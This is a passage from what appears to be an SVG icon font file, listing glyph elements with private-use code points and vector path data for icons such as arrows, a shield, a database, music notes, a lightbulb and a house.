30.931-15.872h3.162c8.313 0 15.059-6.746 15.059-15.059s-6.746-15.059-15.059-15.059h-37.888c-9.246 0-15.932-5.933-15.932-14.095 0-13.553 13.523-15.571 21.594-15.571h22.588c8.313 0 15.059-6.746 15.059-15.059s-6.746-15.059-15.059-15.059h-43.249c-9.939 0-13.493-7.53-13.493-14.577 0-5.060 11.023-13.764 21.233-15.451h29.094c8.313 0 15.059-6.746 15.059-15.059s-6.746-15.059-15.059-15.059h-29.606c-0.211 0-0.391-0.12-0.603-0.12h-19.004c-8.885 0-16.113-6.837-16.113-15.209s7.228-15.209 16.113-15.209h134.114c4.488 0 8.734-1.988 11.595-5.452 2.861-3.464 4.036-8.012 3.192-12.409l-15.661-82.341c-1.868-8.222-7.168-31.503-0.994-41.863 1.596-2.651 5.482-5.541 10.24-5.541 5.903 0 11.957 4.728 17.047 13.252l97.551 157.636c2.74 4.428 7.589 7.138 12.8 7.138h77.372c8.403 0 15.119-6.747 15.119-15.059z" />
<glyph unicode="&#xe672;" d="M421.647 419.764v-90.353h-30.118v60.236h-120.471v-361.412h49.483v-30.118h-129.084v30.118h49.483v361.412h-120.471v-60.236h-30.117v90.353h331.294z" />
<glyph unicode="&#xe673;" d="M512-1.882v-30.118h-512v30.118h512zM156.702 239.781l126.615-91.136 168.448 188.265v-68.788h30.118v121.525h-121.555v-30.118h71.259l-152.697-170.616-124.356 89.57-131.674-119.146 20.209-22.317 113.634 102.762z" />
<glyph unicode="&#xe674;" d="M155.588 214.875l-131.644 119.145 20.179 22.317 113.634-102.791 126.615 91.136 168.448-188.236v68.819h30.118v-121.555h-121.555v30.118h71.259l-152.667 170.617-124.386-89.57zM0-1.882v-30.118h512v30.118h-512z" />
<glyph unicode="&#xe675;" d="M320.632 84.074l21.293-21.293-85.925-85.956-85.956 85.956 21.293 21.293 49.604-49.604v113.604h30.118v-113.604l49.574 49.604zM240.941 413.531v-113.604h30.117v113.604l49.574-49.574 21.293 21.293-85.925 85.925-85.956-85.925 21.293-21.293 49.604 49.573zM0 239.059v-30.117h512v30.118h-512z" />
<glyph unicode="&#xe676;" d="M66.469 239.059h113.604v-30.117h-113.604l49.574-49.574-21.293-21.293-85.925 85.925 85.956 85.956 21.293-21.293-49.604-49.604zM417.25 309.956l-21.293-21.293 49.574-49.604h-113.604v-30.118h113.604l-49.574-49.574 21.293-21.293 85.925 85.925-85.925 85.956zM240.941-32h30.117v512h-30.118v-512z" />
<glyph unicode="&#xe677;" d="M180.706 301.553h30.118v-60.236h-30.118v30.118h-60.236v-240.941h30.118v-30.118h-90.353v30.118h30.117v240.941h-60.236v-30.118h-30.117v60.235h180.706zM481.882 419.764h-301.176v-77.613h30.118v47.495h120.471v-361.412h-30.118v-30.118h90.353v30.118h-30.118v361.412h120.471v-47.495h30.117v77.613h-30.118z" />
<glyph unicode="&#xe678;" d="M256 329.412c-58.127 0-105.412-47.285-105.412-105.412s47.285-105.412 105.412-105.412 105.412 47.284 105.412 105.412-47.284 105.412-105.412 105.412zM256 148.706c-41.502 0-75.294 33.792-75.294 75.294s33.792 75.294 75.294 75.294 75.294-33.792 75.294-75.294-33.792-75.294-75.294-75.294zM271.059 359.529h-30.118v90.353h30.118v-90.353zM240.941 88.471h30.117v-90.353h-30.118v90.353zM481.882 239.059v-30.117h-90.353v30.118h90.353zM120.471 208.941h-90.353v30.118h90.353v-30.118zM362.496 309.203l-21.293 21.293 63.88 63.88 21.293-21.293-63.88-63.88zM149.504 138.797l21.293-21.293-63.88-63.88-21.293 21.293 63.88 63.88zM362.496 138.797l63.88-63.88-21.293-21.293-63.88 63.88 21.293 21.293zM149.504 309.203l-63.88 63.88 21.293 21.293 63.88-63.88-21.293-21.293z" />
<glyph unicode="&#xe679;" d="M251.603 370.191l146.161-146.191-146.191-146.191-21.293 21.293 109.839 109.839h-340.118v30.118h340.089l-109.809 109.809 21.323 21.324zM481.882 480v-512h30.118v512h-30.118z" />
<glyph unicode="&#xe67a;" d="M512 208.911h-340.089l109.809-109.809-21.293-21.293-146.191 146.191 146.191 146.191 21.293-21.293-109.869-109.869h340.149v-30.118zM0-32h30.117v512h-30.117v-512z" />
<glyph unicode="&#xe67b;" d="M451.764 449.401c0-49.815-40.538-90.353-90.353-90.353s-90.353 40.538-90.353 90.353h-30.118c0-49.815-40.538-90.353-90.353-90.353s-90.353 40.538-90.353 90.353h-30.117v-206.216c0-162.786 210.884-240.941 219.889-244.164l5-1.837 5.030 1.747c9.036 3.102 221.846 77.914 221.846 245.097v205.372h-30.118zM60.236 243.215v126.614c22.076-25.058 54.422-40.9 90.353-40.9 36.020 0 68.246 16.053 90.353 41.231v-334.728c-49.965 22.498-180.706 92.371-180.706 207.781zM451.764 244.028c0-117.308-129.295-185.615-180.706-208.173v334.336c22.106-25.178 54.332-41.231 90.353-41.231 35.93 0 68.276 15.812 90.353 40.87v-125.802z" />
<glyph unicode="&#xe67c;" d="M30.117 480v-512h451.764v512h-451.764zM451.764-1.882h-391.529v451.764h60.236v-32.889c-17.499-6.234-30.118-22.799-30.118-42.406 0-24.907 20.269-45.176 45.177-45.176s45.177 20.269 45.177 45.176c0 19.607-12.619 36.172-30.118 42.406v32.889h90.353v-32.889c-17.499-6.234-30.118-22.799-30.118-42.406 0-24.907 20.269-45.176 45.176-45.176s45.176 20.269 45.176 45.176c0 19.607-12.62 36.172-30.118 42.406v32.889h90.353v-32.889c-17.498-6.234-30.118-22.799-30.118-42.406 0-24.907 20.269-45.176 45.176-45.176s45.176 20.269 45.176 45.176c0 19.607-12.62 36.172-30.118 42.406v32.889h60.236v-451.764zM150.588 374.588c0-8.282-6.776-15.059-15.059-15.059s-15.059 6.776-15.059 15.059 6.776 15.059 15.059 15.059 15.059-6.776 15.059-15.059zM271.059 374.588c0-8.282-6.776-15.059-15.059-15.059s-15.059 6.776-15.059 15.059 6.776 15.059 15.059 15.059 15.059-6.776 15.059-15.059zM391.529 374.588c0-8.282-6.776-15.059-15.059-15.059s-15.059 6.776-15.059 15.059 6.776 15.059 15.059 15.059 15.059-6.776 15.059-15.059z" />
<glyph unicode="&#xe67d;" d="M512 374.588c0 68.458-131.916 105.412-256 105.412s-256-36.954-256-105.412c0-4.487 0.723-9.577 2.409-15.059h-2.409v-286.118c0-68.457 131.916-105.412 256-105.412s256 36.954 256 105.412v286.118h-2.409c1.687 5.481 2.409 10.572 2.409 15.059zM256 449.882c129.295 0 225.882-39.755 225.882-75.294 0-11.987-11.685-25.148-32.918-37.014-42.737-23.974-114.868-38.279-192.964-38.279s-150.227 14.306-192.964 38.279c-21.233 11.867-32.919 25.028-32.919 37.014 0 35.539 96.588 75.294 225.882 75.294zM256-1.882c-129.295 0-225.882 39.755-225.882 75.294v49.182c5.27-4.066 11.053-8.162 18.191-12.137 47.044-26.323 124.687-42.044 207.691-42.044 10.39 0 20.691 0.241 30.81 0.723 71.108 3.343 135.68 18.281 176.851 41.322v0c0 0.030 0.030 0.030 0.030 0.030 7.108 4.005 12.95 8.072 18.191 12.137v-49.212c0-35.539-96.587-75.294-225.882-75.294zM448.964 136.749c-42.767-23.943-114.868-38.25-192.964-38.25-9.758 0-19.456 0.241-28.973 0.663-66.68 3.072-126.585 16.625-163.99 37.557v0c-21.203 11.926-32.919 25.088-32.919 37.075v49.212c5.27-4.066 11.084-8.162 18.221-12.137 47.014-26.323 124.657-42.044 207.661-42.044s160.648 15.721 207.661 42.044c7.138 3.976 12.95 8.072 18.221 12.137v-49.212c0-11.987-11.716-25.148-32.918-37.045zM448.933 237.161c-42.737-23.944-114.839-38.25-192.934-38.25s-150.196 14.306-192.934 38.25c-21.233 11.867-32.949 25.058-32.949 37.045v49.212c5.27-4.096 11.053-8.162 18.191-12.168 47.044-26.353 124.657-42.074 207.691-42.074s160.647 15.721 207.691 42.074c7.138 4.006 12.921 8.072 18.191 12.168v-49.212c0-11.987-11.716-25.178-32.949-37.044z" />
<glyph unicode="&#xe67e;" d="M220.070 273.332c0 58.609-47.676 106.285-106.285 106.285-58.579 0-106.255-47.676-106.255-106.285 0-58.579 47.676-106.255 106.255-106.255 22.107 0 42.647 6.837 59.663 18.402-37.075-104.508-120.169-116.766-124.476-117.339l3.705-29.877c1.536 0.18 154.353 21.173 167.544 232.628l-0.392 0.030c0.030 0.813 0.241 1.566 0.241 2.41zM113.784 197.165c-41.984 0-76.138 34.154-76.138 76.137s34.154 76.168 76.138 76.168c42.014 0 76.168-34.183 76.168-76.168s-34.154-76.137-76.168-76.137zM503.988 270.923c0.030 0.813 0.241 1.596 0.241 2.409 0 58.609-47.676 106.285-106.255 106.285s-106.255-47.676-106.255-106.285c0-58.579 47.676-106.255 106.255-106.255 22.106 0 42.647 6.837 59.663 18.402-37.045-104.508-120.17-116.766-124.476-117.339l3.704-29.877c1.536 0.18 154.353 21.173 167.544 232.628l-0.421 0.030zM397.974 197.165c-41.984 0-76.137 34.154-76.137 76.137s34.154 76.168 76.137 76.168 76.137-34.183 76.137-76.168-34.154-76.137-76.137-76.137z" />
<glyph unicode="&#xe67f;" d="M396.62 250.684c-22.106 0-42.676-6.837-59.693-18.432 37.044 104.569 120.2 116.856 124.507 117.399l-3.704 29.877c-1.536-0.181-154.383-21.203-167.544-232.659l0.452-0.030c0-0.813-0.241-1.627-0.241-2.44 0-58.579 47.676-106.255 106.255-106.255s106.255 47.676 106.255 106.255-47.707 106.285-106.285 106.285zM396.62 68.262c-42.014 0-76.137 34.154-76.137 76.137s34.154 76.137 76.137 76.137 76.137-34.154 76.137-76.137-34.154-76.137-76.137-76.137zM112.429 250.684c-22.106 0-42.647-6.837-59.663-18.432 37.044 104.569 120.169 116.856 124.476 117.399l-3.704 29.877c-1.536-0.181-154.353-21.203-167.575-232.659l0.452-0.030c0-0.813-0.241-1.627-0.241-2.44 0-58.579 47.676-106.255 106.255-106.255s106.255 47.676 106.255 106.255-47.646 106.285-106.255 106.285zM112.429 68.262c-42.014 0-76.138 34.154-76.138 76.137s34.153 76.137 76.138 76.137 76.138-34.154 76.138-76.137-34.124-76.137-76.138-76.137z" />
<glyph unicode="&#xe680;" d="M431.586 239.059l-56.5 131.825-103.544-294.641-120.923 394.842-71.379-232.026h-79.24v-30.118h101.466l49.092 159.503 118.964-388.608 108.333 308.103 33.852-78.998h100.292v30.118z" />
<glyph unicode="&#xe681;" d="M512 299.294h-90.594v54.754l-135.62 125.952h-195.674v-180.706h-90.112v-240.941h90.353v-93.364h331.294v93.365h90.353v240.941zM300.935 424.825l70.325-65.295h-70.325v65.295zM120.23 449.882h150.588v-120.47h120.471v-30.118h-271.059v150.588zM391.529-4.894h-271.059v150.588h271.059v-150.588zM481.882 88.471h-60.236v87.341h-331.294v-87.341h-60.236v180.706h451.764v-180.706zM331.475 88.471h-180.887v30.118h180.887v-30.118zM271.059 28.236h-120.471v30.118h120.471v-30.118zM90.353 208.941h-30.117v30.118h30.117v-30.118zM150.588 208.941h-30.118v30.118h30.118v-30.118z" />
<glyph unicode="&#xe682;" d="M481.882 193.882c0-124.567-101.316-225.882-225.882-225.882s-225.882 101.316-225.882 225.882c0 105.351 74.572 198.144 177.333 220.642l6.445-29.425c-89.028-19.486-153.66-99.9-153.66-191.217 0-107.942 87.823-195.764 195.764-195.764s195.764 87.823 195.764 195.764c0 91.196-64.542 171.611-153.48 191.187l6.476 29.425c102.641-22.619 177.122-115.38 177.122-220.612zM271.059 480h-30.118v-301.176h30.118v301.176z" />
<glyph unicode="&#xe683;" d="M90.353 359.529v-151.010c0-82.793 74.33-150.167 165.647-150.167s165.647 67.373 165.647 150.167v151.010h-331.294zM391.529 208.519c0-66.198-60.808-120.049-135.53-120.049s-135.53 53.851-135.53 120.049v120.892h271.059v-120.892zM211.305 389.647h-30.118v90.353h30.118v-90.353zM330.812 389.647h-30.118v90.353h30.118v-90.353zM240.941 58.353h30.117v-90.353h-30.118v90.353zM331.294 239.059h-150.588v30.118h150.588v-30.118zM331.294 178.824h-150.588v30.118h150.588v-30.118z" />
<glyph unicode="&#xe684;" d="M451.313 210.658l30.058-2.018c-7.921-118.061-106.918-210.522-225.37-210.522-124.567 0-225.882 101.316-225.882 225.882 0 117.609 91.769 216.546 208.956 225.25l2.228-30.027c-101.526-7.53-181.067-93.275-181.067-195.223 0-107.942 87.823-195.764 195.764-195.764 102.671 0 188.446 80.113 195.313 182.423zM512 254.148v-15.059l-15.089-0.512h-225.34v241.453l15.089-0.030c124.266-0.271 225.34-101.617 225.34-225.852zM481.461 268.695c-6.716 95.473-83.606 172.965-179.772 180.555v-180.555h179.772z" />
<glyph unicode="&#xe685;" d="M481.882 449.099h-331.535c-65.686 0-119.115-53.428-119.115-119.115s53.428-119.085 119.115-119.085h90.594v-212.781h30.118v420.864h60.687v-420.864h30.118v420.864h120.019v30.118zM240.941 240.987h-90.594c-49.092 0-88.998 39.906-88.998 88.968 0 49.092 39.906 88.998 88.998 88.998h90.594v-177.965z" />
<glyph unicode="&#xe686;" d="M0 480v-512h512v512h-512zM481.882-1.882h-451.764v451.764h451.764v-451.764zM120.471 171.836v-83.365h30.117v83.365c22.227 6.565 38.581 26.925 38.581 51.23s-16.354 44.664-38.581 51.23v85.233h-30.118v-85.233c-22.227-6.566-38.581-26.925-38.581-51.23s16.354-44.695 38.581-51.23zM135.53 246.588c12.981 0 23.522-10.571 23.522-23.522s-10.541-23.522-23.522-23.522-23.522 10.541-23.522 23.522 10.541 23.522 23.522 23.522zM240.941 235.836v-147.365h30.117v147.365c22.227 6.565 38.581 26.925 38.581 51.23s-16.354 44.664-38.581 51.23v21.233h-30.118v-21.233c-22.227-6.565-38.581-26.925-38.581-51.23s16.354-44.695 38.581-51.23zM256 310.588c12.981 0 23.522-10.571 23.522-23.522s-10.541-23.552-23.522-23.552-23.522 10.572-23.522 23.552 10.541 23.522 23.522 23.522zM376.471 75.911c29.575 0 53.639 24.064 53.639 53.639 0 24.335-16.354 44.664-38.581 51.23v178.748h-30.118v-178.748c-22.227-6.565-38.58-26.925-38.58-51.23 0-29.575 24.064-53.639 53.639-53.639zM376.471 153.103c12.981 0 23.522-10.572 23.522-23.522s-10.572-23.522-23.522-23.522-23.522 10.572-23.522 23.522 10.541 23.522 23.522 23.522z" />
<glyph unicode="&#xe687;" d="M256.512 481.054l-256.512-97.009v-322.048l256-96.015 256 96.015v322.018l-255.488 97.039zM454.295 373.745l-77.884-29.214-197.482 74.963 77.553 29.334 197.813-75.084zM256 299.385l-198.204 74.331 78.577 29.696 197.3-74.902-77.673-29.124zM30.117 351.909l210.823-79.059v-269.011l-210.823 79.059v269.011zM271.059 3.84v269.011l210.824 79.059v-269.011l-210.823-79.059z" />
<glyph unicode="&#xe688;" d="M444.687 345.706l12.68 27.286-216.425 100.472v-297.502c-15.39 13.372-35.238 21.745-57.163 21.745-48.399 0-87.763-39.394-87.763-87.763s39.364-87.763 87.763-87.763 87.763 39.394 87.763 87.763c0 1.596-0.392 3.102-0.482 4.638v311.717l173.628-80.595zM183.778 52.3c-31.804 0-57.645 25.841-57.645 57.645s25.841 57.645 57.645 57.645 57.645-25.841 57.645-57.645-25.871-57.645-57.645-57.645z" />
<glyph unicode="&#xe689;" d="M180.706 472.019v-277.745c-15.42 13.433-35.328 21.865-57.344 21.865-48.399 0-87.763-39.394-87.763-87.763s39.364-87.763 87.763-87.763c47.285 0 85.684 37.677 87.431 84.54v0 0.18c0.030 1.024 0.301 1.988 0.301 3.072s-0.241 2.018-0.271 3.042v183.537l271.059-53.037v-140.529c-15.45 13.583-35.478 22.106-57.645 22.106-48.399 0-87.763-39.394-87.763-87.763s39.364-87.763 87.763-87.763c47.736 0 86.498 38.34 87.552 85.805l0.211-0.060v353.461l-331.294 64.813zM123.362 70.731c-31.804 0-57.645 25.841-57.645 57.645s25.841 57.645 57.645 57.645c30.75 0 55.718-24.245 57.344-54.573v-6.114c-1.626-30.358-26.594-54.603-57.344-54.603zM210.823 345.645v89.811l271.059-53.067v-89.75l-271.059 53.007zM424.237-1.882c-31.804 0-57.645 25.841-57.645 57.645s25.841 57.645 57.645 57.645 57.645-25.841 57.645-57.645-25.841-57.645-57.645-57.645z" />
<glyph unicode="&#xe68a;" d="M256 480c-91.347 0-165.647-74.3-165.647-165.647v-180.706c0-91.347 74.3-165.647 165.647-165.647s165.647 74.3 165.647 165.647v180.706c0 91.347-74.3 165.647-165.647 165.647zM391.529 133.647c0-74.722-60.808-135.53-135.53-135.53s-135.53 60.808-135.53 135.529v180.706c0 74.722 60.808 135.529 135.53 135.529s135.53-60.808 135.53-135.529v-180.706zM256 374.588c-24.907 0-45.177-20.269-45.177-45.176v-60.236c0-24.907 20.269-45.176 45.177-45.176s45.176 20.269 45.176 45.177v60.236c0 24.907-20.269 45.176-45.177 45.176zM271.059 269.177c0-8.313-6.747-15.059-15.059-15.059s-15.059 6.747-15.059 15.059v60.236c0 8.313 6.746 15.059 15.059 15.059s15.059-6.746 15.059-15.059v-60.236z" />
<glyph unicode="&#xe68b;" d="M256 480c-91.347 0-165.647-74.3-165.647-165.647v-180.706c0-91.347 74.3-165.647 165.647-165.647s165.647 74.3 165.647 165.647v180.706c0 91.347-74.3 165.647-165.647 165.647zM391.529 314.353v-15.059h-120.471v149.052c67.584-7.589 120.471-64.421 120.471-133.994zM240.941 448.346v-149.052h-120.471v15.059c0 69.572 52.886 126.404 120.471 133.993zM256-1.882c-74.722 0-135.53 60.808-135.53 135.53v135.529h271.059v-135.529c0-74.722-60.808-135.529-135.53-135.529z" />
<glyph unicode="&#xe68c;" d="M322.831 191.563v0l-0.301 0.301c-0.392 0.332-0.663 0.723-1.084 1.024l-0.091-0.12-50.296 38.611v171.882c34.334-6.566 60.236-35.057 60.236-69.15l15.029-1.807 15.089 1.807c0 50.598-39.424 92.22-90.353 99.268v46.622h-30.118v-46.622c-50.929-7.047-90.353-48.67-90.353-99.268 0-28.371 12.679-55.356 34.666-74.481l-0.15-0.151 1.204-0.933c0 0 0 0 0 0v0l54.633-41.984v-171.821c-34.334 6.565-60.236 35.057-60.236 69.15h-30.118c0-50.597 39.424-92.22 90.353-99.268v-46.652h30.118v46.652c50.929 7.048 90.353 48.67 90.353 99.268 0 30.298-14.125 58.398-38.581 77.673zM205.463 281.796c-15.721 13.433-24.756 32.436-24.756 52.315 0 34.093 25.901 62.584 60.236 69.15v-148.721l-35.478 27.256zM271.059 44.74v148.661l33.25-25.57c17.077-13.462 26.986-33.009 26.986-53.94 0-34.093-25.901-62.584-60.236-69.15z" />
<glyph unicode="&#xe68d;" d="M256 118.588c74.722 0 135.529 60.808 135.529 135.53v90.353c0 69.602-52.887 126.404-120.471 133.994v1.536h-30.118v-1.536c-67.584-7.59-120.471-64.392-120.471-133.994v-90.353c0-74.722 60.807-135.53 135.53-135.53zM180.706 417.988v-58.459h30.118v79.752c9.397 4.488 19.456 7.529 30.118 9.065v-88.817h30.117v88.817c10.661-1.536 20.721-4.548 30.118-9.065v-79.752h30.118v58.459c18.582-19.004 30.118-44.906 30.118-73.517v-15.059h-210.823v15.059c0 28.612 11.535 54.543 30.118 73.517zM150.588 299.294h210.823v-45.176c0-58.127-47.284-105.412-105.412-105.412s-105.412 47.284-105.412 105.412v45.177zM451.764 269.177v-97.883c0-62.253-60.808-112.941-135.529-112.941h-45.176v-90.353h-30.118v90.353h-45.177c-74.722 0-135.53 50.688-135.53 112.941v97.882h30.118v-97.882c0-45.688 47.285-82.823 105.412-82.823h120.47c58.127 0 105.412 37.135 105.412 82.823v97.882h30.118z" />
<glyph unicode="&#xe68e;" d="M481.882 389.647v-60.236h-451.764v60.236h451.764zM30.117 178.824h451.764v60.236h-451.764v-60.236zM30.117 28.236h451.764v60.236h-451.764v-60.236z" />
<glyph unicode="&#xe68f;" d="M481.882 419.764v-60.236h-331.294v60.236h331.294zM150.588 208.941h331.294v60.236h-331.294v-60.236zM150.588 58.353h331.294v60.236h-331.294v-60.236zM60.236 419.764c-16.625 0-30.117-13.462-30.117-30.118s13.492-30.118 30.117-30.118 30.118 13.462 30.118 30.118-13.493 30.118-30.117 30.118zM60.236 269.177c-16.625 0-30.117-13.463-30.117-30.118s13.492-30.117 30.117-30.117 30.118 13.462 30.118 30.118-13.493 30.118-30.117 30.118zM60.236 118.588c-16.625 0-30.117-13.462-30.117-30.118s13.492-30.118 30.117-30.118 30.118 13.462 30.118 30.118-13.493 30.118-30.117 30.118z" />
<glyph unicode="&#xe690;" d="M316.205 346.338l-147.637 42.707-168.569 0.603v-331.294h161.069l156.491-44.544 164.322 48.339v332.529l-165.677-48.339zM180.706 354.198l120.47-34.846v-269.553l-120.471 34.304v270.095zM30.117 359.529h120.47v-271.571l-120.471 0.512v271.059zM451.764 84.676l-120.471-35.449v270.125l120.471 35.148v-269.824z" />
<glyph unicode="&#xe691;" d="M451.764 359.529v-2.078l-0.392 1.747-30.57-6.656c-4.187 54.302-49.212 97.34-104.568 97.34-55.447 0-100.563-43.219-104.629-97.642l-30.9 6.716v0.572h-180.706v-331.294h161.069l156.492-44.544 164.322 48.339v327.5h-30.118zM316.236 419.764c41.532 0 75.294-33.792 75.294-75.294 0-54.392-51.772-126.765-75.294-156.822-23.522 30.058-75.294 102.43-75.294 156.822 0 41.502 33.762 75.294 75.294 75.294zM180.706 328.147l32.557-7.077c12.409-68.337 72.463-144.204 87.913-162.816v-138.601l-120.471 34.304v274.191zM30.117 329.412h120.47v-271.571l-120.471 0.512v271.059zM331.294 19.11v139.173c15.481 18.643 75.685 94.72 87.974 163.117l32.497 7.048v-273.89l-120.471-35.449zM357.135 341.971c0 22.558-18.341 40.9-40.9 40.9s-40.9-18.341-40.9-40.9 18.341-40.93 40.9-40.93 40.9 18.341 40.9 40.93zM305.453 341.971c0 5.964 4.849 10.782 10.782 10.782s10.782-4.849 10.782-10.782-4.849-10.812-10.782-10.812-10.782 4.849-10.782 10.812z" />
<glyph unicode="&#xe692;" d="M30.117 208.941c0-66.44 51.532-120.471 114.838-120.471v-30.118c-79.932 0-144.956 67.554-144.956 150.588s65.024 150.588 144.956 150.588h127.367l-49.573 49.574 21.293 21.293 85.956-85.925-85.925-85.956-21.323 21.323 49.604 49.574h-127.397c-63.308 0-114.838-54.031-114.838-120.471zM367.044 359.529v-30.117c63.308 0 114.839-54.031 114.839-120.471s-51.531-120.471-114.839-120.471h-127.397l49.574 49.574-21.293 21.293-85.925-85.925 85.956-85.956 21.293 21.293-49.604 49.604h127.368c79.963 0 144.987 67.554 144.987 150.588s-65.024 150.588-144.956 150.588z" />
<glyph unicode="&#xe693;" d="M256 464.941c-91.317 0-165.647-74.3-165.647-165.647 0-131.704 147.968-303.766 154.262-311.055l11.385-13.101 11.385 13.132c6.295 7.259 154.262 179.32 154.262 311.025 0 91.347-74.33 165.647-165.647 165.647zM256 21.76c-34.515 42.887-135.53 177.062-135.53 277.534 0 74.722 60.808 135.529 135.53 135.529s135.529-60.808 135.529-135.529c0-100.382-101.014-234.647-135.53-277.534zM256 385.461c-49.815 0-90.353-40.538-90.353-90.353s40.538-90.353 90.353-90.353 90.353 40.538 90.353 90.353-40.538 90.353-90.353 90.353zM256 234.873c-33.22 0-60.236 27.016-60.236 60.236s27.016 60.236 60.236 60.236 60.236-27.016 60.236-60.236-27.015-60.236-60.236-60.236z" />
<glyph unicode="&#xe694;" d="M512 359.529v-30.117h-361.412v30.117h361.412zM90.353 344.471c0-24.908-20.269-45.177-45.176-45.177s-45.176 20.269-45.176 45.177 20.269 45.176 45.176 45.176 45.176-20.269 45.176-45.176zM60.236 344.471c0 8.282-6.746 15.059-15.059 15.059s-15.059-6.776-15.059-15.059 6.746-15.059 15.059-15.059 15.059 6.776 15.059 15.059zM150.588 208.941h361.412v30.118h-361.412v-30.118zM90.353 224c0-24.908-20.269-45.176-45.176-45.176s-45.176 20.269-45.176 45.177 20.269 45.177 45.176 45.177 45.176-20.269 45.176-45.177zM60.236 224c0 8.282-6.746 15.059-15.059 15.059s-15.059-6.776-15.059-15.059 6.746-15.059 15.059-15.059 15.059 6.776 15.059 15.059zM150.588 88.471h361.412v30.118h-361.412v-30.118zM90.353 103.529c0-24.908-20.269-45.176-45.176-45.176s-45.176 20.269-45.176 45.176 20.269 45.176 45.176 45.176 45.176-20.269 45.176-45.176zM60.236 103.529c0 8.283-6.746 15.059-15.059 15.059s-15.059-6.776-15.059-15.059 6.746-15.059 15.059-15.059 15.059 6.776 15.059 15.059z" />
<glyph unicode="&#xe695;" d="M256 480c-91.317 0-165.647-78.818-165.647-175.676 0-70.897 29.034-110.532 54.633-145.498 19.185-26.142 35.72-48.731 35.72-80.505v-63.127c0-26.022 20.269-47.195 45.177-47.195h60.236c24.908 0 45.176 21.173 45.176 47.195v64.030c0 31.473 15.571 52.254 35.238 78.577 24.546 32.858 55.115 73.698 55.115 146.523 0 96.858-74.331 175.676-165.647 175.676zM286.118-1.882h-60.236c-8.282 0-15.059 7.65-15.059 17.077v49.182h90.353v-49.182c0-9.427-6.776-17.077-15.059-17.077zM342.408 175.842c-17.679-23.642-35.84-47.978-40.237-81.348h-92.522c-4.578 33.19-22.709 58.036-40.358 82.131-24.004 32.768-48.821 66.65-48.821 127.699 0 80.263 60.808 145.559 135.53 145.559s135.529-65.295 135.529-145.559c0-62.796-24.967-96.196-49.122-128.482z" />
<glyph unicode="&#xe696;" d="M358.25 419.343l-171.399-391.108h23.974v-30.118h-90.353v30.118h33.461l171.399 391.108h-24.154v30.118h90.353v-30.118h-33.28z" />
<glyph unicode="&#xe697;" d="M325.271 50.041v-30.118h-138.541v30.118h54.212v223.804h-52.706v30.117h82.823v-253.922h54.212zM240.58 358.174c25.54 0 46.14 20.661 46.14 46.14 0 25.51-20.63 46.2-46.14 46.2-25.57 0-46.201-20.691-46.201-46.2 0-25.48 20.66-46.14 46.201-46.14z" />
<glyph unicode="&#xe698;" d="M512 239.059c0-66.439-54.031-120.47-120.471-120.47-36.051 0-69.572 16.022-92.582 43.731l-0.060-0.030-0.421 0.542c-0.332 0.421-0.783 0.692-1.144 1.144l0.12 0.091-109.447 134.988c-17.137 19.276-41.743 30.358-67.524 30.358-49.815 0-90.353-40.538-90.353-90.353 0-49.815 40.538-90.353 90.353-90.353 27.558 0 53.278 12.348 70.536 33.882l0.271-0.211 24.606 30.479 23.431-18.914-24.787-30.69-0.301 0.241c-22.98-28.522-57.133-44.906-93.756-44.906-66.439 0-120.471 54.031-120.471 120.471 0 66.44 54.031 120.471 120.471 120.471 33.732 0 65.837-14.366 88.636-39.183l0.241 0.18 1.265-1.566 111.375-137.337c17.257-20.872 42.436-32.918 69.541-32.918 49.815 0 90.353 40.538 90.353 90.353 0 49.815-40.538 90.353-90.353 90.353-25.48 0-49.694-10.902-66.861-29.786l-28.551-35.388-23.431 18.914 28.551 35.388-0.12 0.091c22.889 25.991 55.868 40.9 90.413 40.9 66.44 0 120.47-54.031 120.47-120.47z" />
<glyph unicode="&#xe699;" d="M0 389.647v-361.412h512v361.412h-512zM481.882 58.353h-451.764v301.176h451.764v-301.176zM77.162 73.080l-30.117 0.663c0.994 43.068 42.105 79.872 99.659 90.865v9.819c-7.469 7.8-12.8 18.372-16.414 27.798-4.879 3.493-9.096 8.854-12.017 15.541-5.572 12.348-4.608 24.726 1.897 32.166-0.121 2.228-0.18 4.428-0.18 6.536l-0.060 5.541c-0.18 16.173-0.482 42.767 27.98 47.707 5.843 10.21 14.547 18.884 35.508 19.607 33.822 1.054 57.706-11.385 65.807-34.666 2.74-7.981 0.18-14.607-1.686-19.426-1.777-4.578-3.464-8.885-2.47-16.987 0.392-3.222 0.332-6.385 0.090-9.396 5.27-7.138 6.355-17.98 2.47-29.364-2.861-8.222-7.5-14.577-13.071-18.312-3.343-8.644-8.132-18.191-14.667-25.45v-11.354c57.495-11.294 97.22-47.315 98.214-90.594l-30.118-0.692c-0.692 30.75-36.442 57.464-85.022 63.518l-13.191 1.656v51.471l6.024 4.517c3.192 2.409 8.162 9.668 12.499 22.919l4.066 10.361 2.228 19.004c0.422 3.192 0.813 6.234 0.572 8.071-1.868 15.661 1.988 25.6 4.276 31.503 0.15 0.422 0.271 0.692 0.362 0.933-6.325 11.927-26.474 12.439-35.268 12.228-8.343-0.332-8.945-1.506-10.571-4.608-2.048-3.976-6.897-13.312-19.185-14.396-2.771-0.241-3.644-0.813-3.644-0.813-1.235-1.928-1.144-11.053-1.084-17.107l0.030-5.873c0-4.246 0.301-8.794 0.874-13.432l2.108-17.257 3.614-0.632 0.090-7.469c4.638-14.035 10.21-21.715 13.583-24.034l6.476-4.488v-50.808l-13.312-1.566c-48.549-5.692-85.654-33.069-86.347-63.699zM451.764 239.059h-150.588v30.118h150.588v-30.118zM421.647 178.824h-120.471v30.118h120.471v-30.118z" />
<glyph unicode="&#xe69a;" d="M271.059 359.529h169.412l-108.695 120.471h-211.305v-120.471h120.471v-112.128h-33.882v-279.401h97.882v279.401h-33.882v112.128zM150.588 449.882h167.786l54.363-60.236h-222.148v60.236zM274.824-1.882h-37.647v219.166h37.647v-219.166z" />
<glyph unicode="&#xe69b;" d="M421.647-1.882h-90.353v180.706h-150.588v-180.706h-90.353v271.059h-30.117v-301.176h391.529v301.176h-30.118v-271.059zM210.823-1.882v150.588h90.353v-150.588h-90.353zM505.856 285.048l-17.829-24.305-232.026 170.466-232.026-170.406-17.829 24.275 249.856 183.476 249.856-183.507z" />
